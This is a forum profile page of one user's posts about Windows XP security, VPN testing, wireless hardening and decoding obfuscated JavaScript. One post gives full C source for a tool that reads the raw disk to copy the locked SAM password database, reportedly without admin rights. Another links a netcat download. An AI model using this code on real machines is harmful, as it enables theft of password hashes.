Iain

Active Members
Posts: 319
Days Won: 2

Everything posted by Iain

  1. I guess if someone has an XP SP3 fully patched PC, they could try it. The last time that I played around was well before SP3. Now, if it could be changed to WRITE directly to anywhere on the disc, that could be very dangerous ... (yes, I suppose that writing to the disc isn't all that hard, but what about the File Table entry and setting the file permissions etc.?). Edit: as a matter of interest, I'm fairly sure that the same poster on Rohitab produced code to copy any file using the same technique. I recall that user interaction was as the executable was run, rather than having to modify the code then recompile it. That made it much more user friendly. I don't know if it's been tried on Vista.
  2. Here's the code:

        /* SAMRead - by Napalm @ NetCore2K
           -------------------------------
           Please try and read and understand this source code. You will learn something.

           Sector  = 512 bytes of disk space.
           Cluster = A group of sectors. This is different depending on your file system,
                     but normally it's 4Kb so that's 8 sectors.
           VCN     = Virtual Cluster Number. Simply the index of the cluster within its context.
           LCN     = Logical Cluster Number. The physical cluster index on the containing media.
           Extent  = The extent of a cluster index.

           The DirectCopy function invokes a device control code to get the cluster
           information about a file. We then loop through each resulting extent and
           copy each cluster to a new file. */
        #define _WIN32_WINNT 0x0500
        #include <windows.h>
        #include <winioctl.h>

        BOOL DirectCopy(LPSTR lpszSrc, LPSTR lpszDest)
        {
            BOOL bResult = FALSE;
            /* Open the source with attribute access only: no read access is needed for the IOCTL */
            HANDLE hSrc = CreateFile(lpszSrc, FILE_READ_ATTRIBUTES,
                                     (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE),
                                     NULL, OPEN_EXISTING, 0, 0);
            if(hSrc != INVALID_HANDLE_VALUE){
                CHAR szDrive[7];
                wsprintf(szDrive, "%c:", *lpszSrc);
                DWORD dwSectorPerCluster, dwBytesPerSector;
                GetDiskFreeSpace(szDrive, &dwSectorPerCluster, &dwBytesPerSector, NULL, NULL);
                DWORD dwClusterSize = (dwBytesPerSector * dwSectorPerCluster);
                LARGE_INTEGER liFileSize;
                liFileSize.LowPart = GetFileSize(hSrc, (LPDWORD)&liFileSize.HighPart);
                DWORD dwClusters = (liFileSize.QuadPart / dwClusterSize);
                /* Room for one VCN/LCN pair per cluster, the worst case for extents */
                DWORD dwRead, dwWritten,
                      dwPointsSize = sizeof(RETRIEVAL_POINTERS_BUFFER) + (dwClusters * (sizeof(LARGE_INTEGER) * 2));
                PRETRIEVAL_POINTERS_BUFFER pPoints = (PRETRIEVAL_POINTERS_BUFFER) new BYTE[dwPointsSize];
                STARTING_VCN_INPUT_BUFFER vcnStart = { 0 };
                /* Ask the file system where the file's clusters live on the volume */
                if(DeviceIoControl(hSrc, FSCTL_GET_RETRIEVAL_POINTERS, &vcnStart, sizeof(vcnStart),
                                   pPoints, dwPointsSize, &dwWritten, NULL)){
                    wsprintf(szDrive, "\\\\.\\%c:", *lpszSrc);
                    /* Open the raw volume so the clusters can be read directly */
                    HANDLE hDrive = CreateFile(szDrive, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
                                               NULL, OPEN_EXISTING, 0, 0);
                    if(hDrive != INVALID_HANDLE_VALUE){
                        HANDLE hDest = CreateFile(lpszDest, GENERIC_WRITE, 0, NULL, CREATE_NEW, 0, 0);
                        if(hDest != INVALID_HANDLE_VALUE){
                            /* Pre-size the destination to the source file's length */
                            SetFilePointer(hDest, liFileSize.LowPart, &liFileSize.HighPart, FILE_BEGIN);
                            SetEndOfFile(hDest);
                            LPBYTE lpCluster = new BYTE[dwClusterSize];
                            LARGE_INTEGER vcnPrev = pPoints->StartingVcn;
                            for(DWORD dwExtent = 0; dwExtent < pPoints->ExtentCount; dwExtent++){
                                DWORD dwLength = (DWORD)(pPoints->Extents[dwExtent].NextVcn.QuadPart - vcnPrev.QuadPart);
                                LARGE_INTEGER liSrcPos = { (pPoints->Extents[dwExtent].Lcn.QuadPart * dwClusterSize) };
                                LARGE_INTEGER liDstPos = { (vcnPrev.QuadPart * dwClusterSize) };
                                /* Copy the extent cluster by cluster from the volume into the new file */
                                for(DWORD dwCluster = 0; dwCluster < dwLength; dwCluster++){
                                    SetFilePointer(hDrive, liSrcPos.LowPart, &liSrcPos.HighPart, FILE_BEGIN);
                                    ReadFile(hDrive, lpCluster, dwClusterSize, &dwRead, NULL);
                                    SetFilePointer(hDest, liDstPos.LowPart, &liDstPos.HighPart, FILE_BEGIN);
                                    WriteFile(hDest, lpCluster, dwRead, &dwWritten, NULL);
                                    liSrcPos.QuadPart += dwClusterSize;
                                    liDstPos.QuadPart += dwClusterSize;
                                }
                                vcnPrev = pPoints->Extents[dwExtent].NextVcn;
                            }
                            delete[] lpCluster;   /* allocated with new[], so release with delete[] */
                            CloseHandle(hDest);
                            bResult = TRUE;
                        }
                        CloseHandle(hDrive);
                    }
                }
                delete[] (LPBYTE)pPoints;   /* same: the buffer came from new BYTE[] */
                CloseHandle(hSrc);
            }
            return bResult;
        }

        int main(int argc, char *argv[])
        {
            CHAR szSAMFile[MAX_PATH + 12];
            GetSystemDirectory(szSAMFile, MAX_PATH);
            lstrcat(szSAMFile, "\\config\\SAM");
            return DirectCopy(szSAMFile, ".\\SAM.dat");
        }

    from http://www.rohitab.com/discuss/index.php?s...&hl=samread There's a compiled executable there too. The code can be changed to grab the system file too. I read a couple of comments on the same group that the SAM and system files can be retrieved whether logged in with admin rights or not. I've not tried it though.
  3. I'm fairly sure that the SAM file can be obtained without admin access. I'm not entirely familiar with the programming, but the file is obtained by accessing the drive directly rather than via the File Table. The location of the file is obtained and the drive accessed directly. I'll see if I can find the details if anyone's interested.
  4. Netcat

    I, too, spotted that the site's down. I noticed a few months ago. Fortunately, I came across this ---> hxxp://www.securityforest.com/downloads/nc.exe
  5. It's been flaky for me over the weekend but I managed to get the other function:

        function First(key, pt) {
            // Key scheduling: fill s[] with 0..255, then shuffle it using the key bytes
            var s = new Array();
            for (var i = 0; i < 256; i++) { s[i] = i; }
            var j = 0;
            var x;
            for (i = 0; i < 256; i++) {
                j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
                x = s[i]; s[i] = s[j]; s[j] = x;
            }
            // Keystream generation: XOR each character of pt with the next keystream byte
            i = 0; j = 0;
            var ct = '';
            for (var y = 0; y < pt.length; y++) {
                i = (i + 1) % 256;
                j = (j + s[i]) % 256;
                x = s[i]; s[i] = s[j]; s[j] = x;
                ct += String.fromCharCode(pt.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
            }
            return ct;
        };

    I think it's some form of encrypting/decrypting code. As I said in my first post, the "nitty gritty" is: document.write(FunctionOne(FunctionTwo(<Random Array of Letters and Numbers>)). I've been researching the other function and it seems that atob() isn't available in IE (only Netscape, but I might be wrong). As far as I can tell, atob() relates to decoding Base64 ... but what about the remainder of that function and the other one that I've posted? I hope there are some JavaScript experts who can help me to solve this. EDIT: I just found something very similar here ---> http://www.pastebin.sk/en/6588/
  6. Check this - http://www.castlecops.com/p1099532-Sick_hospital.html I realise that this is some form of encryption (possibly AES). I've tried changing document.write( ... ) to alert ( ... ) but nada. As far as I'm aware, there's no easy way of printing the output of the code to a text file for future analysis/research. Any more tips to decode the encoded "garbage"?
  7. Yes thanks, I'd seen that diary. I'm afraid I'm getting nowhere fast. I've tried using the script debugger that's with Office 2003 but I can't step through the code. If only I could find a way to step through it as I have done with Office VBA macros :-(
  8. The site is down now. Here's the second function. I've tidied it up in Notepad - sorry there are no indents! EDIT: I've searched for some of the strings in the code and came up with http://www.castlecops.com/p1099532-Sick_hospital.html which has obfuscated JavaScript. It, too, has a whole load of "garbage" and I'm interested to know how it was decoded.

        function Second(data) {
            // Drop anything that is not a Base64 character
            data = data.replace(/[^a-z0-9\+\/=]/ig, '');
            // Use the browser's built-in Base64 decoder when it has one
            if (typeof(atob) == 'function') return atob(data);
            var b64_map = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
            var byte1, byte2, byte3;
            var ch1, ch2, ch3, ch4;
            var result = new Array();
            var j = 0;
            // Pad the input to a multiple of four characters
            while ((data.length % 4) != 0) { data += '='; }
            // Every four 6-bit characters give three 8-bit bytes
            for (var i = 0; i < data.length; i += 4) {
                ch1 = b64_map.indexOf(data.charAt(i));
                ch2 = b64_map.indexOf(data.charAt(i + 1));
                ch3 = b64_map.indexOf(data.charAt(i + 2));
                ch4 = b64_map.indexOf(data.charAt(i + 3));
                byte1 = (ch1 << 2) | (ch2 >> 4);
                byte2 = ((ch2 & 15) << 4) | (ch3 >> 2);
                byte3 = ((ch3 & 3) << 6) | ch4;
                result[j++] = String.fromCharCode(byte1);
                // Index 64 is the '=' padding character, so those bytes are not emitted
                if (ch3 != 64) result[j++] = String.fromCharCode(byte2);
                if (ch4 != 64) result[j++] = String.fromCharCode(byte3);
            }
            return result.join('');
        };

    I realise that it's taking the enormous length of "gobbledegook" as <data> and it goes through a replacement process. That's what I don't understand (atob etc.) so I'd like to be able to step through the code (and also the first function) to see exactly how it's working.
  9. I came across some obfuscated JavaScript and I'd like to understand what it does. Basically, there are two functions and the "nitty gritty" is: document.write(FunctionOne(FunctionTwo(<Random Array of Letters and Numbers>)) It seems that FunctionOne and FunctionTwo take the <Random Array of Letters and Numbers> and decode it, or map it in a predefined manner, before passing it to document.write. QUESTION: I'm familiar with VBA in MS Word, Excel etc. and I have a little experience of C++. What's the best way of stepping through the JavaScript (in a controlled manner) to see what happens as the two functions are executed? I know that this is possible (and also set Break Points) in VBA in the MS applications so that's what I'd like to do with the JavaScript. I know there are utilities which will de-obfuscate JavaScript but that's not the issue - I want to know what these complicated functions do to the enormous string of letters and numbers.
  10. Yes, I said it was a hurdle and I agree that it can be overcome easily. I said to use static IP addresses which implies disabling DHCP. Again, I appreciate that it can be circumvented. Agreed. If there's anything that can be done to prevent intrusion, I'd say do it. For instance, I'd disable SSID broadcast and change the encryption password frequently too. I know very well that this means nothing to a determined intruder but these simple configurations (along with WPA2) will dissuade a casual "ordinary" Windows user.
  11. Apply MAC address filtering and use static IP addresses. I'd also be inclined to use an unusual private address range and subnet mask (such as 172.23.10.80/28, rather than the commonly used 192.168.0.0/24). MAC address filtering can be bypassed but it's another hurdle for him to get over.
  12. Maybe the admin's set it up like this to lure someone into doing something dodgy ... ?
  13. Of course, Tortilla may just have started the threads simply to "press our buttons" and get the responses that we've all given.
  14. I think that someone involved with white hat activity would be more likely to use terms like "penetration testing" or "gain access" rather than "I'm trying to 'hack' a network".
  15. Peer to Peer VPN

    OK - I *think* I'm getting somewhere:

    From the PC that's initiating the VPN (and accessing the remote share):

        Ethernet adapter Local Area Connection:
            Connection-specific DNS Suffix . :
            Description . . . . . . . . . . . : Intel(R) PRO/100 VE Network Connection
            Physical Address. . . . . . . . . : 08-08-64-EF-D3-18
            Dhcp Enabled. . . . . . . . . . . : No
            IP Address. . . . . . . . . . . . : 192.168.0.1
            Subnet Mask . . . . . . . . . . . : 255.255.255.0
            Default Gateway . . . . . . . . . :

        PPP adapter Testing:
            Connection-specific DNS Suffix . :
            Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface
            Physical Address. . . . . . . . . : 00-53-45-00-00-00
            Dhcp Enabled. . . . . . . . . . . : No
            IP Address. . . . . . . . . . . . : 169.254.197.169
            Subnet Mask . . . . . . . . . . . : 255.255.255.255
            Default Gateway . . . . . . . . . : 169.254.197.169

    and from the PC which accepts the incoming VPN and has the shared folder:

        Ethernet adapter Local Area Connection:
            Connection-specific DNS Suffix . :
            Description . . . . . . . . . . . : D-Link DFE-530TX PCI Fast Ethernet Adapter (rev.A)
            Physical Address. . . . . . . . . : 70-35-41-A2-4A-18
            Dhcp Enabled. . . . . . . . . . . : No
            IP Address. . . . . . . . . . . . : 192.168.0.2
            Subnet Mask . . . . . . . . . . . : 255.255.255.0
            Default Gateway . . . . . . . . . :

        PPP adapter RAS Server (Dial In) Interface:
            Connection-specific DNS Suffix . :
            Description . . . . . . . . . . . : Internal RAS Server interface for dial in clients
            Dhcp Enabled. . . . . . . . . . . : No
            IP Address. . . . . . . . . . . . : 169.254.207.149
            Subnet Mask . . . . . . . . . . . : 255.255.255.255
            Default Gateway . . . . . . . . . :

    I realise now that when I connect the VPN, two additional interfaces are created and they have APIPA. I started Wireshark (with the VPN connected), collected data from 192.168.0.1 and there was a lot of traffic - including the plain text name of the file that I retrieved. I restarted Wireshark and collected data from 169.254.197.169 and there were 4 frames. None of them related to the file that I retrieved. Needless to say, Wireshark is running on the PC which has 192.168.0.1 as its IP address. I've learned something - that additional "virtual" interfaces are created when the VPN is connected - but why does the majority of my traffic go through the real interfaces rather than the "virtual" ones?
  16. Peer to Peer VPN

    But when I've been through the VPN connection dialogue (entering the Admin name and Password), I get the message in the System Tray which says that the VPN is connected. There are only two addresses available to me - 192.168.0.1/24 and 192.168.0.2/24 and the latter has both the shared folder as well as the incoming VPN connection. I'm confused! :(
  17. Peer to Peer VPN

    Thank you for the suggestion. I wondered if there was some way to do it other than collecting and reviewing network traffic. I didn't know if there was a configuration about which I was unaware.
  18. Goodness - I can't think for a minute that you typed all of those in! Did you get the list from your system (if so, how did you get the details?) or did you get it from a website? Just going from my problem (Run as... for Network Connections), I was aware of Start>Run>runas /user:AdministratorAccountName ncpa.cpl but that doesn't launch Network Connections.
  19. Open Control Panel normally then Shift-Right Click the applet. It'll give you the option to Run as... Interestingly enough, I do exactly the same ... for security. I've not found a way to open Network Connections though via this technique. I've done a fair amount of searching but don't think it can be done. I've resorted to logging off and logging back on or killing explorer.exe then relaunching it as Admin. HTH
  20. Peer to Peer VPN

    Thanks for the quick response, but I'm not sure what you mean. The XP Pro PCs are linked by a cross-over cable. One is 192.168.0.1/24 and the other is 192.168.0.2/24. The latter has the shared folder (and is also set up as the VPN to allow incoming connections) so I can access the shared folder from the first PC using Start>Run>\\192.168.0.2\SharedFolder. If I open the VPN connection between the two PCs and then issue the same Start>Run command, how can I be sure that any information passes along the secure VPN connection (yes, I know it's a REAL PN, rather than a VIRTUAL PN). My ultimate goal is to know how to be sure that data is encrypted when I start to configure PPTP/L2TP & IPSec. @SomeoneE1se - quite correct. It's just for testing and learning purposes at present.
  21. I've been experimenting with VPN between 2 XP Pro PCs connected via a cross-over cable. I created and shared a folder on one PC which I was able to access from the other via Start>Run>\\IP Address\ShareName. I created a VPN connection (with the PC having the shared folder being able to receive incoming connections) and managed to connect the two PCs satisfactorily. The question that I have is regarding accessing the shared folder from the remote PC. If I connect the PCs via the VPN and then access the shared folder (via Start>Run, as before), how can I be sure that any communication between the PCs (i.e. retrieving files from or placing files into the shared folder) occurs through the VPN connection rather than simply via the same route that was used prior to using the VPN connection? I just want to get this straight in my head before I start to look at what happens if I try to VPN within a domain and look into IPSec etc. Thanks for your time (and patience!).
  22. He started TS, not Telnet. Agreed about the security. How about disabling .bat files too - one which reverses one.bat and another which reverses two.bat? I suppose the ultimate would be to combine one.bat, two.bat, three.bat and four.bat into one jumbo batch file with a 4-options menu, one option starting each of the relevant sections. NB - whilst Windows Firewall was considered, there's the problem of configuring Port Forwarding through an ADSL router. It's easy for those who are tech-savvy but not for those who "dont know a dam thing". [sic]
  23. @operat0r_001 Have you thought about using a Thumb Drive with a write protect switch? I know they are difficult to find. I have a fear of putting mine into a PC to have files modified by something on the PC. Sure, I know that I can restore the Thumb Drive from my clean copies of the utilities on my own PC, but I'd prefer to avoid having to do that.
  24. @FearFactory - If you manage to get anywhere with this, can you post your progress please? I'm sure that it will be of interest to others.
  25. I don't think it's possible to get ONLY Recovery Console. Have a look here (almost at the bottom) and here.